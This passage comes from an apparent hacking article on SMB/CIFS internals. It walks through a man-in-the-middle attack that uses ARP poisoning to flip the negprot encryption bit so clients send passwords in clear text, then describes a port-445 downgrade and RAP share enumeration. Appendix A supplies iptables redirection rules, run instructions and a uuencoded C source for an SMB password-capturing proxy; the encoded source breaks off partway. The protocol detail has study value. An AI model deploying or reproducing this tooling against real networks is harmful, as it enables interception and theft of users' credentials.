With this, the password will not be encrypted.

The client will send the password in clear in a sesssetupx request. 
When the attacker has the password, he encrypts it with the encryption
key recovered before and sends the sesssetupx request (with 
the encrypted password) to the server.

The server sends a sesssetupx reply to accept or refuse the session.
The attacker redirects the sesssetupx reply and the whole traffic 

The session will not fail and nobody has saw our man in the middle !.

Description :

           ARP-P                  ARP-P
[client] <---------  [attacker]  ---------> [server]

The attacker processes to a ARP Poisoning attack to redirect the whole
traffic between the two machines.

[client] <---------> [attacker] <---------> [server]

The traffic redirection is operated with NAT and iptables.

            port 139
[client] -----------------> [attacker]        [server]

The attacker receives the first packet to the SMB server port.

[client]  ----------------->[attacker 139]        [server]
                            [attacker 1139]

The attacker redirects it to the port 1139.
On the port 1139, our proxy program is listening. 

          negprot request
[client] -----------------> [attacker]        [server]

The attacker receives the negprot request.

                                     negprot request
[client]                   [attacker]---------------> [server]

The attacker redirects directly the negprot request to the server.

                                     negprot reply
[client]         [attacker] <----------------------------    [server]
                                 (encryption bit set
                              to have password encrypted)

The server replies with a negprot reply with the encryption 
bit set to have the password encrypted. The attacker doesn't
redirects this packet. He changes the encryption bit to have
plain text password .

                  negprot reply
[client] <----------------------------- [attacker]        [server]
               (encryption bit set
           to have plain text password )

The attacker sends the modified negprot reply with the encryption 
bit changed to have the password in clear text. 

            sesssetupX request
[client] ------------------------> [attacker]        [server]
         (password in clear text)

The client sends the password in clear text, the attacker recovers 

                                     sesssetupX request
[client]                [attacker] --------------------->  [server]
                                    (password encrypted)

The attacker sends a sesssetupx request to the server with the 
encrypted password.

                                    sesssetupX reply
[client] <------------- [attacker] <----------------  [server]   

The servers sends the sesssetupx reply. The attacker redirects it.

[client] <------------> [attacker] <--------------> [server]

The attacker continues to redirect traffic between the two machines 
until the end of the SMB session.

The implementation of the man in the middle attack is given in the
Appendix A (the NAT and iptables rules are given also).

Take a look at the source code, you will learn a lot of
details !.

----[ 6.7 - Notes about windows 2k/XP SMB operating over TCP/IP 

As I wrote before, on Windows 2k/XP, SMB can run directly over TCP.
The SMB server is listening incoming connexions on port 445.
But it's not so "directly". In fact instead of having a NETBIOS header
which is 4 bytes long, we have a other header which is 4 bytes long too.

Description :

        |      TCP      |
        |  SMB BASE HDR |

This special header is defined like this :

                UCHAR Zero;   	// Set to zero
                UCHAR Length[3];// Count of data bytes (the 4 bytes of
                                   the header are not included)

This special header is not very different than the NETBIOS header. You 
will understand why.

This is the NETBIOS header :

                UCHAR Type;   	// Type of the packet
                UCHAR Flags;  	// Flags
                USHORT Length;	// Count of data bytes (netbios header
                                                        not included)
When SMB is running over TCP, the NETBIOS request session should 
be not used.

In fact, the NETBIOS names of the client and of the server should not 
be sent. So the value of the "Type" field in the NETBIOS is always 
equal to zero (the "Type" field is different from zero when the client
sends his encoded NETBIOS name - Type = 0x81 - and when it receives 
the reply - Type = 0x82 -). Remember, during the SMB session the
Type field is equal to zero ( it's the "Type" code for the NETBIOS 
session message).

For the first byte nothing is different.

For the last three bytes now :

The "Flags" field of the NETBIOS header is always set to zero.
The length of the packet only takes the two last bytes of the special

The three last bytes are the same.

To conclude there is no difference between the NETBIOS and the special
header when NETBIOS is not used.

Downgrade attack :

If the client (running on windows XP or 2k) has NBT enabled, it always
try to connect to the port 139 and 445 simultaneously. If the client 
has a response from the port 445, the client will send a RST packet 
to the port 139. If the client has no response from the port 445, it 
will try to connect on port 139. If it has no response from the both, 
the session will fail.
If the client has NBT disabled, the client will try on the port 445 

To perform a Downgrade attack i.e force the client to not use the port 
445 and to use the port 139, you have to make believe to the client 
that the 445 is closed. With the transparent proxy attack it's very 
easy, with iptables you have just to redirect the incoming traffic
on the attacker's machine on port 445 to a closed port. With this
the client will use the port 139 (the iptables rules for this is
given in appendix A).
This will work if NBT is enabled.

If the client has NBT disabled, the transparent proxy will operate the 
SMB traffic on port 445. You've got an option on the program for this.

Ok, we have finished with the attack for recovering passwords.
We will study now an another important part of SMB.

--[ 7 - Transaction subprotocol and RAP commands

I will explain in this chapter a panel of special (and obscur ) 
SMB commands : the RAP commands.
These commands use the transaction subprotocol. 
I will also describe this subprotocol.

----[ 7.1 - The transaction subprotocol

When a large amount of data is sent during a SMB session or if there is
a specific operation requested,the SMB protocol includes a transaction 

The transaction subprotocol is mainly used for SMB Remote Procedure 
Calls : The RAP commands (RAP for Remote Administration Protocol). 
But I will explain it later. 

The transaction subprotocol is not a derived protocol of SMB. The 
transaction subprotocol is just an other command for SMB. So the
transaction subprotocol is layered on SMB base header and the command 
code for the transaction subprotocol is 0x25.

Like the other commands there is a request and a reply.

This is the Transaction request header :
 UCHAR WordCount;                 Count of parameter words;   value =
                                  (14 + value of the "SetupCount" field)
 USHORT TotalParameterCount;      Total parameter bytes being sent
 USHORT TotalDataCount;           Total data bytes being sent
 USHORT MaxParameterCount;        Max parameter bytes to return
 USHORT MaxDataCount;             Max data bytes to return
 UCHAR MaxSetupCount;             Max setup words to return
 UCHAR Reserved;
 USHORT Flags;                    Additional information:
                                  bit 0 - also disconnect TID in TID
                                  bit 1 - one-way transaction (no
 ULONG Timeout;
 USHORT Reserved2;
 USHORT ParameterCount;           Parameter bytes sent this buffer
 USHORT ParameterOffset;          Offset (from header start) to
 USHORT DataCount;                Data bytes sent this buffer
 USHORT DataOffset;               Offset (from header start) to data
 UCHAR SetupCount;                Count of setup words
 UCHAR Reserved3;                 Reserved (pad above to word)
 USHORT Setup[SetupCount];        Setup words (# = SetupWordCount)
 USHORT ByteCount;                Count of data bytes
 STRING Name[];                   Name of transaction (NULL if
 UCHAR Pad[];                     Pad to SHORT or LONG
 UCHAR Parameters[                Parameter bytes (# = ParameterCount)
 UCHAR Pad1[];                    Pad to SHORT or LONG
 UCHAR Data[ DataCount ];         Data bytes (# = DataCount)

In a majority of case, a RAP command sent with  Transaction subprotocol 
may need several Transaction packets for sending the parameters 
and data bytes. The parameters bytes are usually sent first, followed 
by the data bytes. If several transaction packets must be involved, 
the server sends this small packet for acknoledgement between each 
transaction packets :

Interim Reply packets :

 UCHAR WordCount;                 Count of parameter words = 0
 USHORT ByteCount;                Count of data bytes = 0

For the transaction request header, the "TotalParameterCount" field 
represents a count of paramaters bytes to be sent and it's the same 
for the "TotalDataCount" field (count of data bytes to be sent). 
The offset from the start of the SMB base header to the parameters 
bytes and the data bytes are given with the "ParameterOffset" and 
"DataOffset" fields. 

The parameters bytes are in the "Parameters" field.
The data bytes are in the "Data" field.

You must understand that these "Parameters" and "Data" fields are used 
for the RAP command. "Parameters" contains the parameters bytes for 
the RAP command and "Data", the data bytes.

The fields for "DataCount" and "ParameterCount" represent respectivily 
the count of data bytes and the count of parameters bytes present in 
the considereted transaction packet. If these fields are equal to 
the "TotalParameterCount" and the "TotalDataCount", it involved that 
all parameter and data bytes fit in a single packet. If they are not, 
it involved that the server (for request) or the client (for reply) 
must wait for another packets. When all packets are received, the 
parameter and data bytes are marshalled for analysis.

Take a look at the field "WordCount", it contains the value  : 
14 + "SetupCount" field, in majority of case SetupCount is equal to 0.

The Transaction reply header: 

There is not a big difference between the reply and the request

 UCHAR WordCount;                 Count of data bytes; value = 10 +
                                  "Setupcount" field.
 USHORT TotalParameterCount;      Total parameter bytes being sent
 USHORT TotalDataCount;           Total data bytes being sent
 USHORT Reserved;
 USHORT ParameterCount;           Parameter bytes sent this buffer
 USHORT ParameterOffset;          Offset (from header start) to
 USHORT ParameterDisplacement;    Displacement of these Parameter
 USHORT DataCount;                Data bytes sent this buffer
 USHORT DataOffset;               Offset (from header start) to data
 USHORT DataDisplacement;         Displacement of these data bytes
 UCHAR SetupCount;                Count of setup words
 UCHAR Reserved2;                 Reserved (pad above to word)
 USHORT Setup[SetupWordCount];    Setup words (# = SetupWordCount)
 USHORT ByteCount;                Count of data bytes
 UCHAR Pad[];                     Pad to SHORT or LONG
 UCHAR                            Parameter bytes (# = ParameterCount)
 UCHAR Pad1[];                    Pad to SHORT or LONG
 UCHAR Data[DataCount];           Data bytes (# = DataCount)

The client must use the "ParameterOffset" and "DataOffset" to know the 
offset (from the beginning of the SMB base header) of data and 
parameters bytes.

----[ 7.2 - RAP commands     

RAP (Remote Administration Protocol) is the SMB implementation of 

RAP request : 

       |TCP HDR                    |
       |NETBIOS HDR                |
       |SMB BASE HDR               |
       |RAP REQUEST DATAS          | 
RAP Reply :

       |TCP HDR                    |
       |NETBIOS HDR                |
       |SMB BASE HDR               |
       |RAP REPLY PARAMETERS       |
       |RAP REPLY DATAS            |

 When you use a RAP command you always find the string "\PIPE\LANMAN" 
 in the "Name" field in the transaction (request and reply) header.
 These are several examples of RAP commands : 
 -NETSHAREENUM : Retrieve information about each shared ressource 
                 on a server

 -NETSERVERENUM2 : List all the computer of specified types in a 
                   specified domain

 -NETSERVERGETINFO : Get information about a specified server

 -NETSHAREGETINFO : Retrieve information about a paticular shared 

 -NETWKSTAUSERLOGON : Execute on a SMB server for logging an user.
 -NETWSTAUSERLOGOFF : The same but for deloging.

 -NETUSERGETINFO : Obtain information about a particular user.

 -NETWKSTAGETINFO : Obtain information about a particular station.

 -SAMOEMCHANGEPASSWORD : For changing the password of a specified user on 
                         a remote SMB server.

I'm not going to describe all of these commands, I will just take one for 
example (to have a listing of shared resource avaible on a server).

If you want to know more about RAP commands read [2].

--[ 8 - Using RAP commands to list available shares on a server

 This part is a complement of the previous chapter. I will explain 
how the RAP commands work by giving an example.

The program given in Appendix B is the implementation of what is 
explained in this chapter. It does the same things that the commands 
"net view \\ServerIP" (for DOS) or "smbclient -L ServerIP -N " 
(on Linux).  But this program allows you to specified the NETBIOS 
name, it is a bit anonymous. If you read this source you will 
learn a lot a things about SMB network programming.
How I can retrieve SMB everyone shares on a network :

The process is easy to understand. The client must be authentificated 
on the server . The client identifies itself with the process developed 
in chapter 3 (with no password). When the server has checked the 
identity of the client, the client sends a Tconx request (after the 
Sessetupx reply).

Tconx means "Tree CONnect and X).

The TconX request packet is used to acess to a shared ressource.

----[ 8.1 - Tconx Packets 

 Request header
 The TconX packets are layered on the SMB Base Header ("Command" = 0x75).

UCHAR WordCount;                   Count of parameter words = 4
UCHAR AndXCommand;                 Secondary (X) command; 0xFF = none
UCHAR AndXReserved;                Reserved (must be 0)
USHORT AndXOffset;                 Offset to next command WordCount
USHORT Flags;                      Additional information
USHORT PasswordLength;             Length of Password[]
USHORT ByteCount;                  Count of data bytes;    min = 3
UCHAR Password[];                  Password
STRING Path[];                     Server name and share name
STRING Service[];                  Service name

The password was sent during the session establishement. 
The Password length is set to 1 and and the Password 
string contains null value (0x00).

The string "Path" contains the name of the ressource that client wishes 
connect. It use the unicode style syntax . For example I want to connect 
 on a share called "myshare" on a server called "myserver" . The 
Path string will containt "\\myserver\myshare". 

The "Service" string contains the type of ressource requested :
	string		Type of ressource
	"A:" 		disk share.
	"LPT1:" 	printer.
	"IPC"  	        named pipe.
	"COMM" 	        communications device.
	"?????" 	any type of device.
For scaning any type of device you must use the "?????" string in the 
"Service" field.

After sending your Tconx request on the server. The server replies with 
a TconX reply. You must recover the "Tid" field (in the SMB Base header) 
which is the Transaction request with the RAP command. 
You must specified to the server that you want to know which ressources 
are available. For this, you must use the RAP command : NETSHAREENUM.

----[ 8.2 - Explanation of the RAP command "NetShareEnum" :

The RAP command that we will study is NetShareEnum.

The RAP Command "NetshareEnum" request  :

The field "Parameters" of the transaction request header received :

  The 16 bit code of function NetShareEnum : 0;
  The parameter desriptor string : "WrLeh" 
  Data descriptor string for returned data : "B13BWZ"
  A 16 bit integer with a value of x01;
  A 16 bit integer that contains the size of the receive buffer.

It will be too long to explain how parameter and data descriptor strings 
works. These strings are used to know the size and the format of 
parameters and datas. One parameter and one data descriptor string 
is defined for each RAP command.

if you want to know more about this strings, read [2].

No datas are needed for this request so the "DataCount" and 
"TotalDataCount" fields are equal to zero. 

  |             NETBIOS HDR                    |---------> 4 bytes
  |             SMB BASE HDR   	               |---------> 32 Bytes
  |        SMB TRANSACTION REQUEST HDR         |

The Transaction request "Parameters" field receives the parameters 
for the RAP request : 

  |      0x0000  | ----------------------------------------> A
  |   W       r  |  L        e  |  h       0x00|-----------> B
  |   B       1  |  3        B  |  W         Z |  0x00 |---> C
  |     0x0001   |     0xffff   |--------------------------> D
  A : The NetshareEmun function code : 0x00                            
  B : The parameter descriptor string
  C : The data descriptor string
  D : 0x01 (defined value) and 0xffff (Max size of the received buffer) 
And the server replies :

the "Parameters" field of the transaction reply header receives :

 A 16 bit integer word that contains the return status code :

 Succes 0
 Access Denied 5
 Network Acess Denied 65
 More data 234
 Server not started 2114
 Transaction configuration bad 2141

 A 16 bit "converted word", uses to calculate an offset to remark 
 A 16 bit containts the number of entries returned = number of 
 SHARE_INFO structure (see below ).
 A 16 bit representing the number of available entries.
 The field "Data" of the transaction reply header contains the several
SHARE_INFO structures.
 The SHARE_INFO structure contains the information about each shared
ressource available and it is defined like this :
  struct SHARE_INFO {
    char shi1_netname[13]; /*Name of the ressource*/
    char shi1_pad; /*Pad to a word*/
    unsigned short shi1_type; 

       /*Code specifies the type of the shared resssource :
          0 Disk Directory tree
          1 Printer queue 
          2 Communications device 
          3 IPC*/

    char *shi1_remark; /*Remark on the specified 


 shi1_remark is a 32 bits pointer to a string. This string contains a
 remark about a shared ressource. You must substract the 16 lower 
 bits of "shi1_remark" to the "converter word" to know the offset 
 between this string and the beginning of the RAP reply parameters 
 In fact with a ascii schema :
  |             NETBIOS HDR                    |------------> 4 bytes
  |             SMB BASE HDR   	               |------------> 32 Bytes
  |             SMB TRANS REPLY HDR            |
Description of the "Parameters" section of the Transaction reply packet 
(corresponding to the parameters of the NetShareEnum reply) :
  |           status code                      |-------------> 2 bytes
  |           converted word                   |-------------> 2 bytes
  |           number of entries returned       |-------------> 2 bytes
  |           number of entries available      |-------------> 2 bytes
Data section of the Transaction reply (corresponding to the 
several SHARE_INFO structures if there is more than one ressource
available) :  
  |         shi1_netname                       |-----------> 13 bytes
  |         shi1_pad to pad to word            |-----------> 1 byte  
  | type of service                            |-----------> 2 bytes
  | pointer to remark string                   |-----------> 4 bytes
          Another SHARE_INFO structures	
  |               remark string 1              |
  |          another remarks strings           |

--[ 9 - Conclusion :

 I hope you have learned a lot of things in this article.
 If you have any comments, questions, send it at :
                   <[email protected]>

--[ 10 - References

[1] "A common Internet File System (CIFS/1.0) Protocol
    Preliminary Draft", Paul J.Leach and Dilip C. Naik

[2] "CIFS Remote Administration Protocol Preliminary Draft"
    Paul J.Leach and Dilip C. Naik

[3] RFC 1001

[4] RFC 1002

--[ 11 - Thanks

Just a Merry Christmas to TearDrop, Frealek and "el Tonio".

A big thank to TearDrop for all. Without him, nothing could
be possible !

Take a look at <>, you will find a very good 
(and free) scanner !.

Thanks to Mr D. (my network administrator !), for all the advices
and the several Linux distribs.

Thanks to the Chemical brothers for the inspirational music.

Thanks to the phrack staff, for all their remarks and particulary 
about the transparent proxy attack.

To you for reading this article ;).

--[  Appendix A

This program allows you to have password in clear directly from
the network when they should be encrypted. It works with libnet 
(v 1.1 !) and libpcap.
This is the implementation of the Transparent proxy attack of the
chapter 6.6.

libnet :

libpcap :

You must be root to compile and to execute this program !

If you want to compile it, you could use : 
       "gcc SMBproxy.c -o SMBproxy -lnet -lpcap"

If you want to use it :
       "SMBproxy -i interface  
                  -c Client's IP address 
		  -s Server's IP address 
		  -f your fake IP (what you want : for example)"
                  -l listening port (1139 by default)

Be careful the program will ask you about Windows 2k/XP specifictions
support. But you must answer "y" when NBT is disabled not when it's 
enabled on Windows 2k/XP !

You give the IP adress of a client and of the server, this program 
waits a connection of the client to a SMBserver, launches the attack, 
recovers the password and redirects the traffic.

The fake IP parameter corresponds to your fake IP, give what you want !
The attacker's machine should have no active connections with the server 
or with the client (like FTP or telnet ...).
The default listening port is 1139

This program gives the password and the user name (if necessary). It 
also gives the security level (share or user). If the connection has 
succeeded, it gives the name of the share and a message like "password 
valid". If it has failed, it gives nothing (just the password and the
user name).

This program should be compiled on Linux for some technical reasons,
like the network byte ordering. You shouldn't use it on the loopback

Support Windows 2k/XP specifications.

This is the iptables/NAT command to execute on the attacker's machine

To redirect incoming traffic to port 139 on port 1139

#iptables -t nat -A PREROUTING -i eth0 -p tcp -s \
--dport 139 -j REDIRECT --to-port 1139 is the IP address of the client. 

To redirect the whole traffic

#iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

To redirect incoming traffic to port 445 on port 1139

(for Windows 2k/XP client with NBT disabled)

#iptables -t nat -A PREROUTING -i eth0 -p tcp -s \
--dport 445 -j REDIRECT --to-port 1139 is the IP address of the client. 

if you want to perform the downgrade attack of the chapter 6.8 remplace
the port 1139 by a closed port.

Be careful, for the traffic redirection, this line must be present in the
/etc/sysconfig/network :


This program doesn't support UNICODE strings.

Successfully tested with samba server 2.0 .

begin 600 smb_MiM_proxy.c
M("`@(%[email protected]@5$A%($U)1$1,12!!5%1!0TL-"B`@("`@("`@("`@
M("`@("`@("`@("!L961I;D!E;F-E<&AA;&]N+7IE<F\N8V]M#[email protected]("`@("`@
M("`@("`@("`@("`@("`@1F]R(&5D=6-A=&EO;F%L('!U<G!O<[email protected];VYL>2`A
M;RYH/@T*(VEN8VQU9&[email protected]/'-T<FEN9RYH/@T*(VEN8VQU9&[email protected]/'-T9&QI8BYH
M/@T*(VEN8VQU9&[email protected]/'5N:7-T9"YH/@T*(VEN8VQU9&[email protected]/&5R<[email protected]^#0HC
M:6YC;'5D92`\<VEG;F%[email protected]^#0HC:6YC;'5D92`\<[email protected]^#0HC
M(VEN8VQU9&[email protected]/'-Y<R]S=&%[email protected]^#0H-"B-I;F-L=61E(#QN970O:68N:#X-
M"B-I;F-L=61E(#QS>7,O<V]C:[email protected]^#0HC:6YC;'5D92`\87)P82]I;F5T
[email protected]^#0H-"B-I;F-L=61E(#QN971I;[email protected]^#0HC:6YC;'5D92`\;F5T
M:6YE="]I;BYH/@T*(VEN8VQU9&[email protected]/&YE=&EN970O=&[email protected]^#0HC:6YC;'5D
[email protected]^#0H-"B-I;F-L=61E(#QL:6)N970N:#X-"B-I;F-L=61E(#QP8V%[email protected]^
M87(-"@T*(V1E9FEN90EU7VEN=#$V7W0)=6YS:[email protected]<VAO<G0-"@T*(V1E
M9FEN90EU7VEN=#,R7W0)=6YS:[email protected]:6YT(`T*#0HC9&5F:6YE"75C:&%R
M0U]+15E?3$5.1U1("[email protected]"@T*(V1E9FEN90E%3D-?4$%34U=/4D1?3$5.1U1(
M*G1Y<&4J+PD-"B!U7VEN=#A?="!&;&%G<SL)+RIF;&%G<RHO#[email protected]=5]I;G0Q
M-E]T($QE;F=T:#L)+RIL96YG=&@@;[email protected]=&AE($Y"5"!S97-S:6]N('!A8VME
M*B\-"B!U7VEN=#A?="!#;VUM86YD.PDO*D-O;6UA;[email protected]]D92HO#[email protected]=6YI
M;[email protected]#[email protected]>PT*("!S=')U8W0-"B`@>PT*("`@=5]I;[email protected])R;W)#;&%S
M<SL)+RI%<G)O<B!#;&%S<RHO#[email protected]("!U7VEN=#A?="!297-E<G9E9#L)+RI2
M97-E<G9E9"!F;W(@9G5T=7)E('5S92HO(`T*("`@=5]I;[email protected])R;W);
M,ET["2\J17)R;W(@0V]D92HO#[email protected]('[email protected]&]S17)R;W([#[email protected]('5?:6YT.%]T
M(%-T871U<ULT73L)+RHS,BUB:71S(&5R<F]R(&-O9&4J+PT*('[email protected]='5S
M(#L-"B!U7VEN=#A?="!&;&%G<SL)+RI&;&%G<RHO#[email protected]=5]I;[email protected]
M9W,R6S)=.PDO*DUO<[email protected],J+PT*('5N:6]N#[email protected]>PT*("!U7VEN=#A?
M="!0861;,3)=.PT*("!S=')U8W0-"B`@>PT*("`@=5]I;[email protected]&ED2&EG
M:%LR73L)+RI(:6=H(%!A<[email protected];[email protected]=&AE(%!I9"HO#[email protected]("!U7VEN=#A?="!5
M;G5S961;-%T["2\J3F]T(%5S960J+PT*("`@=5]I;[email protected]<V5D,ELT
M73L)+RI.;[email protected]"HO#[email protected]('[email protected]<F$[#[email protected]?2!0861%>'1R83L-"B!U
M="!0:61;,ET["2\J0V%L;&5R)W,@<')O8V5S<R!)1"HO#[email protected]=5]I;[email protected]
M="!-:61;,ET["2\J375L=&EP;&5X($ED*B\-"[email protected]%S94AD<B`[#0H-
M"G1Y<&[email protected]<W1R=6-T(`T*>PT*('5?:6YT.%]T(%=O<F1#;W5N=#L)"2\J
M0V]U;[email protected];[email protected]<&%R86UE=&5R('=O<F1S(#TQ-RHO#[email protected]=5]I;[email protected]&EA
M('5?:6YT.%]T(%-E8W5R:71Y36]D93L)"2\J4V5C=7)I='[email protected]]D92`Z*B\-
M"@D)"0DO*F)I="`P(#[email protected],#US:&%[email protected],3UU<V5R*B\-"@D)"0DO*F)I="`Q
M(#[email protected],3UE;F-R>7!T('!A<W-W;W)D<RHO#[email protected]=5]I;[email protected]%X37!X0V]U
M;G1;,ET["2\J36%X(%!E;F1I;F<@;75L=&EP;&[email protected]<F5Q=65S="HO#[email protected]
M=5]I;[email protected]%X3G5M8F5R<U9C<ULR73L)[email protected]@5D-S(&)E='=E965N
M(&-L:65N="!A;[email protected]<V5R=F5R*B\-"B!U7VEN=#A?="!-87A"=69F97)3:7IE
M6S1=.PDO*DUA>"!T<F%N<VUI="!B=69F97(@<VEZ92HO#[email protected]=5]I;[email protected]
M36%X4F%W4VEZ95LT73L)[email protected]@<F%W(&)U9F9E<B!S:7IE*B\-"B!U7VEN
M"B!U7VEN=#A?="!3>7-T96U4:6UE2&EG:%LT73L)+RI3>[email protected]*%[email protected]
M=&EM92!O9B!T:&[email protected]<V5R=F5R("HO#[email protected]=5]I;[email protected]=F5R5&EM95IO
M;F5;,ET["2\J5&EM92!Z;VYE(&]F('-E<G9E<B`H;6EN(&9R;[email protected]#*2HO
M#[email protected]=5]I;[email protected]<GEP=&EO;DME>4QE;F=T:#L)+RI,96YG=&@@;[email protected]
M0V]U;[email protected];[email protected]&%T82!B>71E<RHO#0I](%-M8DYE9U!R;W1297!L>4AD<[email protected]
M#0H-"G1Y<&[email protected]<W1R=6-T#0I[#[email protected]=5]I;[email protected]]R9$-O=6YT.PDO
M:6YT.%]T($%N9%A#;VUM86YD.PDO*G-E8V]N9&%R>2`H6"[email protected]]M;6%N9"PP
M>$9&(#[email protected];F]N92HO#[email protected]=5]I;[email protected]%)E<V5R=F5D.PDO*G)E<V5R
M.PDO*F]F9G-E="!T;R!N97AT(&-O;6UA;[email protected]]R9&-O=6YT*B\-"B!U7VEN
M=#A?="!-87A"=69F97)3:7IE6S)=.PDO*D-L:65N="=S(&UA>&[email protected]
M3G5M8F5R6S)=.PDO*C`]9FER<[email protected]*&]N;'DI+"!N;VYZ97)O+6%D9&ET:6]N
[email protected],@;G5M8F5R*B\-"B!U7VEN=#A?="!397-S:6]N2V5Y6S1=.PDO*G-E
M<W-I;[email protected]:V5Y("HO#[email protected]=5]I;[email protected]%S94EN<V5N<VET:79E4&%S<W=O
M:6YT.%]T($-A<V5396YS:71I=F5087-S=V]R9$QE;F=T:%[email protected]+RIS:7IE
M(&]F('!A<W-W;W)D("A53DE#3T1%*2HO#[email protected]=5]I;[email protected])V961;
M8FEL:71I97-;-%T["2\J8VQI96YT(&-A<&%B:6QI=&EE<RHO#[email protected]=5]I;G0X
[email protected]=6YT6S)=.PD)+RI#;W5N="!O9B!D871A(&)Y=&5S.VUI;CTP
M*B\-"[email protected]=7!84F5Q=65S=$AD<B`[#0H-"G1Y<&[email protected]<W1R=6-T
M#0I[#[email protected]=5]I;[email protected]]R9$-O=6YT.PDO*G9A;'5E/[email protected]*B\-"B!U7VEN
M=#A?="!!;F180V]M;6%N9#L)+RIS96-O;F1A<[email protected]*%@I(&-O;6UA;F0L,'A&
M9"`H;75S="!B92!Z97)O*2HO#[email protected]=5]I;[email protected]$]F9G-E=%LR73L)
[email protected]*B\-"B!U7VEN=#A?="!&;&%G<ULR73L)+RI!9&1I=&EO;F%L
M(&EN9F]R;6%T:6]N("HO#[email protected]=5]I;[email protected]&%S<W=O<F1,96YG=&A;,ET[
M,ET["2\J0V]U;[email protected];[email protected]&%T82!B>71E<R`[(&UI;CTS*B\-"[email protected]&-O
M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHO#0H-"G9O:[email protected])P4F5Q=65S<DEN
M:F5C=&EO;BAU7VEN=#,[email protected]*BP-"B`@("`@("`@("`@("`@("`@("`@("`@
M("!U7VEN=#,[email protected]*BP-"B`@("`@("`@("`@("`@("`@("`@("`@("!U7V-H
M("`@("`@("`@("`@("`@("`@("`@("!C:&%R("HL#0H)"[email protected]<&-A<%]T("HI
M.PT*#0H-"G9O:[email protected])P4&]I<V]N*'5?:6YT,S)?="`J+`T*("`@("`@("`@
M("`@("`@=5]I;G0S,E]T("HL#[email protected]("`@("`@("`@("`@("!U7V-H87(@*BP-
M<B`J*3L-"@T*=F]I9"!'971%;F5T061D<F5S<[email protected]"B`@("`@("`@("`@("`@
M("`@("`@=5]C:&%R("HL#[email protected]("`@("`@("`@("`@("`@("`@(&-H87(@*BD[
M#0H-"@T*=F]I9"!.96=0<F]T4F5P;'DH#[email protected]("`@("`@("`@("`@("`@("!U
M("`@("`@("`@("`@:6YT("HI.PT*#0IV;VED(%-E='5P6%)E<75E<W0H#[email protected]
M("`@("!U7V-H87(@*BP-"B`@("`@("`@("`@("`@("`@("`@:6YT*[email protected]#0H-
[email protected])3TY3("AS:&%M969U;&QY('1A:V5N(&9R;[email protected]<V%[email protected](2D-
M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"G9O:[email protected]"96YC<GEP="AU
M7V-H87(@*[email protected]=5]C:&%R("HL('5?8VAA<B`J*3L-"@T*=F]I9"!334)/5T9E
M;F-R>7!T*'5?8VAA<B`J+"!U7V-H87(@*[email protected]=5]C:&%R("HI.PT*#0IV;VED
M($5?4#$V*&-O;G-T('5N<VEG;F5D(&-H87(@*[email protected]=6YS:[email protected]<B`J
M("`@("`@("!C;VYS="!U;G-I9VYE9"!C:&%R("HL#[email protected]("`@("`@("`@('5N
M<[email protected]<B`J+&-H87(@*BQC:&%R("HL:6YT*3L-"@T*<W1A=&EC('9O:[email protected]
M<W1R7W1O7VME>2AC;VYS="!U;G-I9VYE9"!C:&%R("HL=6YS:[email protected]
M<B`J*3L-"@T*<W1A=&EC('9O:[email protected]<VUB:&%S:"AU;G-I9VYE9"!C:&%R("HL
M8V]N<[email protected]=6YS:[email protected]<B`J+&-O;G-T(`T*"0EU;G-I9VYE9"!C:&%R
M("`@("`@("`@("`@("`@("`@("[email protected]]$10T**BHJ*BHJ*BHJ*BHJ*BHJ
M*BHJ*BHJ*BHJ+PT*#0HO*E1O('-E;[email protected]!!4E`@<F5P;'DJ+PT*#0IV;VED
M($%R<%!O:7-O;BAU7VEN=#,[email protected]*D-L:65N="[email protected]("`@+RI#;&EE;G0G<R!)
M4"!A9')E<W,J+PT*("`@("`@("`@("`@("!U7VEN=#,[email protected]*E-M8E-E<G9E
M<[email protected]+RI334(@4V5R=F5R)W,@25`@861R97-S*B\-"B`@("`@("`@("`@("`@
M#[email protected]("`@("`@("`@("`@('5?8VAA<B`J16YE=%-M8E-E<G9E<BPO*G-E<G9E
M("\J1&5V:6-E(&YA;[email protected]]R(&EN:F5C=&EO;BHO#0I[#[email protected];&EB;[email protected]
M*FP[#[email protected];&EB;F5T7W!T86=?="!486<[#[email protected]<B!%<G)"=69;3$E"3D54
M7T524D)51E]325I%73L-"@T*#0HO*E=E(&EN:F5C="!T:&[email protected]<&%C:V5T(&1I
M<F5C=&QY(&]N('1H92!N971W;W)K*B\-"@T*(&[email protected]/2!L:6)N971?:6YI="A,
M24).151?3$E.2RQ$979I8V4L17)R0G5F*3L-"@T*+RI792!B=6EL9"!T:&[email protected]
M("`@("`@("`@("`@("`@("`@("`@05)02%)$7T542$52+"\J2&%R9'=A<[email protected]
M861D<BHO#[email protected]("`@("`@("`@("`@("`@("`@("`@("!%5$A%4E194$5?25`L
M("`@-"PO*E-I>[email protected];[email protected]`@861R97-S*B\-"B`@("`@("`@("`@("`@("`@
M<G9E<BPO*E-E<G9E<B!-04,@861D<F5S<RHO#[email protected]("`@("`@("`@("`@("`@
M9&1R97-S*B\-"B`@("`@("`@("`@("`@("`@("`@("`@($Y53$PL#[email protected]("`@
M=VEN9R!B>2!T:&[email protected];&1I;F<@;[email protected]=&AE(&5T:&5R;F5T(&AE861E<BHO
M=&EO;BHO#[email protected]("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("!%;F5T
M4VUB4V5R=F5R+"`@#[email protected]("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("!%5$A%4E194$5?05)0+"`@+RI0<F]T;V-O;"!4>7!E*B\-"@D)"[email protected];"D[
M#0H-"@T*+RI7<FET92!T:&[email protected]&%C:V5T('=I<F4J+PT*#[email protected];&EB;F5T7W=R
M:71E*&PI.PT*#0HO*DQI8FYE="!D97-T<F]Y(&PJ+PT*#[email protected];&EB;F5T7V1E
M+RI4;R!H879E('-E<G9E<B!A;[email protected]($U!0R!A9&1R97-S97,J+PT*
M#0IV;VED($%R<%)E<75E<W1);FIE8W1I;VXH=5]I;G0S,E]T("I)<%[email protected]
M("`@('5?:6YT,S)?="`J27!$<W0L("\J9&5S="=S($E0(&%D<F5S<RHO#[email protected]
M<W)C)W,@34%#($%D<F5S<RHO#[email protected]("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("`@("`@(&-H87(@*[email protected][email protected];F%M
M8V%[email protected]*D1E<V-R*0T*>PT*(&QI8FYE=%]T("IL.PT*(&QI8FYE=%]P=&%G
[email protected]&%G.PT*(&-H87(@17)R0G5F6TQ)0DY%5%]%4E)"549?4TE:15T[#0H-
